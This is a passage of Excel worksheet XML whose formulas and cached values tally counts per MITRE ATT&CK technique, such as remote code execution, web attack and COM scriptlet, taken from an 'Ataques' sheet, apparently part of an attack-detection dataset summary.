      <c r="BQ52" s="471">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!OE52,"")</f>
        <v>5</v>
      </c>
      <c r="BR52" s="471">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!OF52,"")</f>
        <v>2</v>
      </c>
      <c r="BS52" s="471">
        <f>IF('(A) Ataques'!$AP52&lt;&gt;"NO",'(A) Ataques'!OJ52,"")</f>
        <v>3</v>
      </c>
      <c r="BT52" s="331">
        <f>IF('(A) Ataques'!$AK52&lt;&gt;"NO",IF($BO52=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="53" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A53" s="79">
        <f t="shared" si="0"/>
        <v>51</v>
      </c>
      <c r="B53" s="4">
        <f>IF('(A) Ataques'!AK53&lt;&gt;"NO",'(A) Ataques'!E53,"")</f>
        <v>40</v>
      </c>
      <c r="C53" s="6" t="str">
        <f>IF('(A) Ataques'!AK53&lt;&gt;"NO",IF('(A) Ataques'!M53="","",'(A) Ataques'!M53),"")</f>
        <v>T1210-Remote_code_execution</v>
      </c>
      <c r="D53" s="4" t="str">
        <f>IF('(A) Ataques'!AK53&lt;&gt;"NO",'(A) Ataques'!F53,"")</f>
        <v>T1210</v>
      </c>
      <c r="E53" s="286">
        <f>IF('(A) Ataques'!AK53&lt;&gt;"NO",'(A) Ataques'!AQ53,"")</f>
        <v>3</v>
      </c>
      <c r="F53" s="288">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!BB53,"")</f>
        <v>5</v>
      </c>
      <c r="G53" s="392">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!BD53,"")</f>
        <v>3</v>
      </c>
      <c r="H53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!BF53,"")</f>
        <v>3</v>
      </c>
      <c r="I53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!BG53,"")</f>
        <v>2</v>
      </c>
      <c r="J53" s="530">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($F53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BH53,"")</f>
        <v>0</v>
      </c>
      <c r="L53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BJ53,"")</f>
        <v>0</v>
      </c>
      <c r="M53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BL53,"")</f>
        <v>0</v>
      </c>
      <c r="N53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BM53,"")</f>
        <v>0</v>
      </c>
      <c r="O53" s="532">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($K53=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P53" s="292">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BN53,"")</f>
        <v>5</v>
      </c>
      <c r="Q53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BP53,"")</f>
        <v>3</v>
      </c>
      <c r="R53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BR53,"")</f>
        <v>3</v>
      </c>
      <c r="S53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BS53,"")</f>
        <v>2</v>
      </c>
      <c r="T53" s="530">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($P53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BT53,"")</f>
        <v>10</v>
      </c>
      <c r="V53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BV53,"")</f>
        <v>7</v>
      </c>
      <c r="W53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BX53,"")</f>
        <v>7</v>
      </c>
      <c r="X53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$BY53,"")</f>
        <v>3</v>
      </c>
      <c r="Y53" s="532">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($U53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z53" s="288">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!BZ53,"")</f>
        <v>8</v>
      </c>
      <c r="AA53" s="392">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!CB53,"")</f>
        <v>3</v>
      </c>
      <c r="AB53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!CD53,"")</f>
        <v>3</v>
      </c>
      <c r="AC53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!CE53,"")</f>
        <v>1</v>
      </c>
      <c r="AD53" s="331">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF(Z53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CF53,"")</f>
        <v>18</v>
      </c>
      <c r="AF53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CH53,"")</f>
        <v>10</v>
      </c>
      <c r="AG53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CJ53,"")</f>
        <v>10</v>
      </c>
      <c r="AH53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CK53,"")</f>
        <v>3</v>
      </c>
      <c r="AI53" s="287">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($AE53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ53" s="292">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CL53,"")</f>
        <v>0</v>
      </c>
      <c r="AK53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CN53,"")</f>
        <v>0</v>
      </c>
      <c r="AL53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CP53,"")</f>
        <v>0</v>
      </c>
      <c r="AM53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CQ53,"")</f>
        <v>0</v>
      </c>
      <c r="AN53" s="331">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($AJ53=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CR53,"")</f>
        <v>0</v>
      </c>
      <c r="AP53" s="322">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CT53,"")</f>
        <v>0</v>
      </c>
      <c r="AQ53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CV53,"")</f>
        <v>0</v>
      </c>
      <c r="AR53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!$CW53,"")</f>
        <v>0</v>
      </c>
      <c r="AS53" s="287">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($AO53=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT53" s="288">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!CX53,"")</f>
        <v>5</v>
      </c>
      <c r="AU53" s="392">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!CZ53,"")</f>
        <v>3</v>
      </c>
      <c r="AV53" s="4">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!DB53,"")</f>
        <v>3</v>
      </c>
      <c r="AW53" s="20">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",'(A) Ataques'!DC53,"")</f>
        <v>2</v>
      </c>
      <c r="AX53" s="331">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($AT53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AY53" s="469">
        <f>'(A) Ataques'!LU53+'(A) Ataques'!MA53+'(A) Ataques'!MG53+'(A) Ataques'!MM53+'(A) Ataques'!MS53</f>
        <v>2</v>
      </c>
      <c r="AZ53" s="510">
        <f>'(A) Ataques'!LW53+'(A) Ataques'!MC53+'(A) Ataques'!MI53+'(A) Ataques'!MO53+'(A) Ataques'!MU53</f>
        <v>1</v>
      </c>
      <c r="BA53" s="471">
        <f>'(A) Ataques'!LY53+'(A) Ataques'!ME53+'(A) Ataques'!MK53+'(A) Ataques'!MQ53+'(A) Ataques'!MW53</f>
        <v>1</v>
      </c>
      <c r="BB53" s="471">
        <f>'(A) Ataques'!LQ53</f>
        <v>1</v>
      </c>
      <c r="BC53" s="331">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($AY53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BD53" s="469">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!LL53,"")</f>
        <v>5</v>
      </c>
      <c r="BE53" s="510">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!LM53,"")</f>
        <v>4</v>
      </c>
      <c r="BF53" s="471">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!LN53,"")</f>
        <v>1</v>
      </c>
      <c r="BG53" s="471">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!LO53,"")</f>
        <v>3</v>
      </c>
      <c r="BH53" s="471">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!LS53,"")</f>
        <v>2</v>
      </c>
      <c r="BI53" s="331">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($BD53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ53" s="469">
        <f>'(A) Ataques'!OL53+'(A) Ataques'!OR53+'(A) Ataques'!OX53+'(A) Ataques'!PD53+'(A) Ataques'!PJ53</f>
        <v>4</v>
      </c>
      <c r="BK53" s="510">
        <f>'(A) Ataques'!ON53+'(A) Ataques'!OT53+'(A) Ataques'!OZ53+'(A) Ataques'!PF53+'(A) Ataques'!PL53</f>
        <v>4</v>
      </c>
      <c r="BL53" s="471">
        <f>'(A) Ataques'!OP53+'(A) Ataques'!OV53+'(A) Ataques'!PB53+'(A) Ataques'!PH53+'(A) Ataques'!PN53</f>
        <v>4</v>
      </c>
      <c r="BM53" s="495">
        <f>'(A) Ataques'!OH53</f>
        <v>3</v>
      </c>
      <c r="BN53" s="331">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($BJ53=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO53" s="469">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!OC53,"")</f>
        <v>4</v>
      </c>
      <c r="BP53" s="510">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!OD53,"")</f>
        <v>4</v>
      </c>
      <c r="BQ53" s="471">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!OE53,"")</f>
        <v>4</v>
      </c>
      <c r="BR53" s="471">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!OF53,"")</f>
        <v>3</v>
      </c>
      <c r="BS53" s="471">
        <f>IF('(A) Ataques'!$AP53&lt;&gt;"NO",'(A) Ataques'!OJ53,"")</f>
        <v>3</v>
      </c>
      <c r="BT53" s="331">
        <f>IF('(A) Ataques'!$AK53&lt;&gt;"NO",IF($BO53=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="54" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A54" s="79">
        <f t="shared" si="0"/>
        <v>52</v>
      </c>
      <c r="B54" s="4">
        <f>IF('(A) Ataques'!AK54&lt;&gt;"NO",'(A) Ataques'!E54,"")</f>
        <v>40</v>
      </c>
      <c r="C54" s="6" t="str">
        <f>IF('(A) Ataques'!AK54&lt;&gt;"NO",IF('(A) Ataques'!M54="","",'(A) Ataques'!M54),"")</f>
        <v>T1210-Web_attack</v>
      </c>
      <c r="D54" s="4" t="str">
        <f>IF('(A) Ataques'!AK54&lt;&gt;"NO",'(A) Ataques'!F54,"")</f>
        <v>T1210</v>
      </c>
      <c r="E54" s="286">
        <f>IF('(A) Ataques'!AK54&lt;&gt;"NO",'(A) Ataques'!AQ54,"")</f>
        <v>260</v>
      </c>
      <c r="F54" s="288">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!BB54,"")</f>
        <v>0</v>
      </c>
      <c r="G54" s="392">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!BD54,"")</f>
        <v>0</v>
      </c>
      <c r="H54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!BF54,"")</f>
        <v>0</v>
      </c>
      <c r="I54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!BG54,"")</f>
        <v>0</v>
      </c>
      <c r="J54" s="530">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($F54=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="K54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BH54,"")</f>
        <v>0</v>
      </c>
      <c r="L54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BJ54,"")</f>
        <v>0</v>
      </c>
      <c r="M54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BL54,"")</f>
        <v>0</v>
      </c>
      <c r="N54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BM54,"")</f>
        <v>0</v>
      </c>
      <c r="O54" s="532">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($K54=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P54" s="292">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BN54,"")</f>
        <v>0</v>
      </c>
      <c r="Q54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BP54,"")</f>
        <v>0</v>
      </c>
      <c r="R54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BR54,"")</f>
        <v>0</v>
      </c>
      <c r="S54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BS54,"")</f>
        <v>0</v>
      </c>
      <c r="T54" s="530">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($P54=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="U54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BT54,"")</f>
        <v>26204</v>
      </c>
      <c r="V54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BV54,"")</f>
        <v>771</v>
      </c>
      <c r="W54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BX54,"")</f>
        <v>3</v>
      </c>
      <c r="X54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$BY54,"")</f>
        <v>257</v>
      </c>
      <c r="Y54" s="532">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($U54=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z54" s="288">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!BZ54,"")</f>
        <v>6570</v>
      </c>
      <c r="AA54" s="392">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!CB54,"")</f>
        <v>279</v>
      </c>
      <c r="AB54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!CD54,"")</f>
        <v>2</v>
      </c>
      <c r="AC54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!CE54,"")</f>
        <v>257</v>
      </c>
      <c r="AD54" s="331">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF(Z54=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CF54,"")</f>
        <v>32774</v>
      </c>
      <c r="AF54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CH54,"")</f>
        <v>1050</v>
      </c>
      <c r="AG54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CJ54,"")</f>
        <v>5</v>
      </c>
      <c r="AH54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CK54,"")</f>
        <v>257</v>
      </c>
      <c r="AI54" s="287">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($AE54=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ54" s="292">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CL54,"")</f>
        <v>0</v>
      </c>
      <c r="AK54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CN54,"")</f>
        <v>0</v>
      </c>
      <c r="AL54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CP54,"")</f>
        <v>0</v>
      </c>
      <c r="AM54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CQ54,"")</f>
        <v>0</v>
      </c>
      <c r="AN54" s="331">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($AJ54=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AO54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CR54,"")</f>
        <v>0</v>
      </c>
      <c r="AP54" s="322">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CT54,"")</f>
        <v>0</v>
      </c>
      <c r="AQ54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CV54,"")</f>
        <v>0</v>
      </c>
      <c r="AR54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!$CW54,"")</f>
        <v>0</v>
      </c>
      <c r="AS54" s="287">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($AO54=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AT54" s="288">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!CX54,"")</f>
        <v>0</v>
      </c>
      <c r="AU54" s="392">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!CZ54,"")</f>
        <v>0</v>
      </c>
      <c r="AV54" s="4">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!DB54,"")</f>
        <v>0</v>
      </c>
      <c r="AW54" s="20">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",'(A) Ataques'!DC54,"")</f>
        <v>0</v>
      </c>
      <c r="AX54" s="331">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($AT54=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="AY54" s="469">
        <f>'(A) Ataques'!LU54+'(A) Ataques'!MA54+'(A) Ataques'!MG54+'(A) Ataques'!MM54+'(A) Ataques'!MS54</f>
        <v>0</v>
      </c>
      <c r="AZ54" s="510">
        <f>'(A) Ataques'!LW54+'(A) Ataques'!MC54+'(A) Ataques'!MI54+'(A) Ataques'!MO54+'(A) Ataques'!MU54</f>
        <v>0</v>
      </c>
      <c r="BA54" s="471">
        <f>'(A) Ataques'!LY54+'(A) Ataques'!ME54+'(A) Ataques'!MK54+'(A) Ataques'!MQ54+'(A) Ataques'!MW54</f>
        <v>0</v>
      </c>
      <c r="BB54" s="471">
        <f>'(A) Ataques'!LQ54</f>
        <v>0</v>
      </c>
      <c r="BC54" s="331">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($AY54=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="BD54" s="469">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!LL54,"")</f>
        <v>514</v>
      </c>
      <c r="BE54" s="510">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!LM54,"")</f>
        <v>514</v>
      </c>
      <c r="BF54" s="471">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!LN54,"")</f>
        <v>0</v>
      </c>
      <c r="BG54" s="471">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!LO54,"")</f>
        <v>2</v>
      </c>
      <c r="BH54" s="471">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!LS54,"")</f>
        <v>257</v>
      </c>
      <c r="BI54" s="331">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($BD54=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BJ54" s="469">
        <f>'(A) Ataques'!OL54+'(A) Ataques'!OR54+'(A) Ataques'!OX54+'(A) Ataques'!PD54+'(A) Ataques'!PJ54</f>
        <v>12923</v>
      </c>
      <c r="BK54" s="510">
        <f>'(A) Ataques'!ON54+'(A) Ataques'!OT54+'(A) Ataques'!OZ54+'(A) Ataques'!PF54+'(A) Ataques'!PL54</f>
        <v>280</v>
      </c>
      <c r="BL54" s="471">
        <f>'(A) Ataques'!OP54+'(A) Ataques'!OV54+'(A) Ataques'!PB54+'(A) Ataques'!PH54+'(A) Ataques'!PN54</f>
        <v>2</v>
      </c>
      <c r="BM54" s="495">
        <f>'(A) Ataques'!OH54</f>
        <v>257</v>
      </c>
      <c r="BN54" s="331">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($BJ54=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="BO54" s="469">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!OC54,"")</f>
        <v>12923</v>
      </c>
      <c r="BP54" s="510">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!OD54,"")</f>
        <v>280</v>
      </c>
      <c r="BQ54" s="471">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!OE54,"")</f>
        <v>2</v>
      </c>
      <c r="BR54" s="471">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!OF54,"")</f>
        <v>1</v>
      </c>
      <c r="BS54" s="471">
        <f>IF('(A) Ataques'!$AP54&lt;&gt;"NO",'(A) Ataques'!OJ54,"")</f>
        <v>257</v>
      </c>
      <c r="BT54" s="331">
        <f>IF('(A) Ataques'!$AK54&lt;&gt;"NO",IF($BO54=0,0,1),"")</f>
        <v>1</v>
      </c>
    </row>
    <row r="55" spans="1:72" s="1" customFormat="1" ht="15" customHeight="1" thickBot="1">
      <c r="A55" s="79">
        <f t="shared" si="0"/>
        <v>53</v>
      </c>
      <c r="B55" s="4">
        <f>IF('(A) Ataques'!AK55&lt;&gt;"NO",'(A) Ataques'!E55,"")</f>
        <v>41</v>
      </c>
      <c r="C55" s="6" t="str">
        <f>IF('(A) Ataques'!AK55&lt;&gt;"NO",IF('(A) Ataques'!M55="","",'(A) Ataques'!M55),"")</f>
        <v>T1218.010-COM_Scriptlet</v>
      </c>
      <c r="D55" s="4" t="str">
        <f>IF('(A) Ataques'!AK55&lt;&gt;"NO",'(A) Ataques'!F55,"")</f>
        <v>T1218</v>
      </c>
      <c r="E55" s="286">
        <f>IF('(A) Ataques'!AK55&lt;&gt;"NO",'(A) Ataques'!AQ55,"")</f>
        <v>2</v>
      </c>
      <c r="F55" s="288">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!BB55,"")</f>
        <v>3</v>
      </c>
      <c r="G55" s="392">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!BD55,"")</f>
        <v>3</v>
      </c>
      <c r="H55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!BF55,"")</f>
        <v>3</v>
      </c>
      <c r="I55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!BG55,"")</f>
        <v>1</v>
      </c>
      <c r="J55" s="530">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($F55=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="K55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BH55,"")</f>
        <v>0</v>
      </c>
      <c r="L55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BJ55,"")</f>
        <v>0</v>
      </c>
      <c r="M55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BL55,"")</f>
        <v>0</v>
      </c>
      <c r="N55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BM55,"")</f>
        <v>0</v>
      </c>
      <c r="O55" s="532">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($K55=0,0,1),"")</f>
        <v>0</v>
      </c>
      <c r="P55" s="292">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BN55,"")</f>
        <v>3</v>
      </c>
      <c r="Q55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BP55,"")</f>
        <v>3</v>
      </c>
      <c r="R55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BR55,"")</f>
        <v>3</v>
      </c>
      <c r="S55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BS55,"")</f>
        <v>1</v>
      </c>
      <c r="T55" s="530">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($P55=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="U55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BT55,"")</f>
        <v>3</v>
      </c>
      <c r="V55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BV55,"")</f>
        <v>3</v>
      </c>
      <c r="W55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BX55,"")</f>
        <v>3</v>
      </c>
      <c r="X55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$BY55,"")</f>
        <v>1</v>
      </c>
      <c r="Y55" s="532">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($U55=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="Z55" s="288">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!BZ55,"")</f>
        <v>2</v>
      </c>
      <c r="AA55" s="392">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!CB55,"")</f>
        <v>2</v>
      </c>
      <c r="AB55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!CD55,"")</f>
        <v>1</v>
      </c>
      <c r="AC55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!CE55,"")</f>
        <v>2</v>
      </c>
      <c r="AD55" s="331">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF(Z55=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AE55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CF55,"")</f>
        <v>5</v>
      </c>
      <c r="AF55" s="322">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CH55,"")</f>
        <v>5</v>
      </c>
      <c r="AG55" s="4">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CJ55,"")</f>
        <v>4</v>
      </c>
      <c r="AH55" s="20">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",'(A) Ataques'!$CK55,"")</f>
        <v>2</v>
      </c>
      <c r="AI55" s="287">
        <f>IF('(A) Ataques'!$AK55&lt;&gt;"NO",IF($AE55=0,0,1),"")</f>
        <v>1</v>
      </c>
      <c r="AJ55" s="292">
